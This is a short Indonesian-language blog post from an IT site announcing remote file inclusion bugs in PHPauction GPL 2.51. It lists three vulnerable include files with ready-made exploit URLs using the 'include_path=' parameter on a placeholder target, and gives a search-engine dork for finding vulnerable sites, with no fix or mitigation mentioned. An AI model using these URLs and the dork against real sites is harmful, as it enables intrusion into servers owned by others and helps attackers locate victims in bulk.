stmikbg-dot-com

Informasi Seputar IT

Archive for the ‘Web App Bugs’


PHPauction GPL 2.51 Multiple RFI Vulnerabilities

Baru-baru ini ditemui celah keamanan pada aplikasi PHPauction GPL 2.51 yang bisa diserang dengan tehnik remote file inclusion. File PHPauction bisa didownload disini

Adapun bugs ini terdapat pada file converter.inc.php , messages.inc.php dan setting.inc.php . Bugs ini bisa diexploit pada link

http://target.com/auction/includes/converter.inc.php?include_path=

http://target.CoM/auction/includes/messages.inc.php?include_path=

http://target.CoM/auction/includes/settings.inc.php?include_path=

Untuk pencarian target dengan dork “PHPauction GPL 2.51″ “/auction/includes/settings.inc.php?include_path=”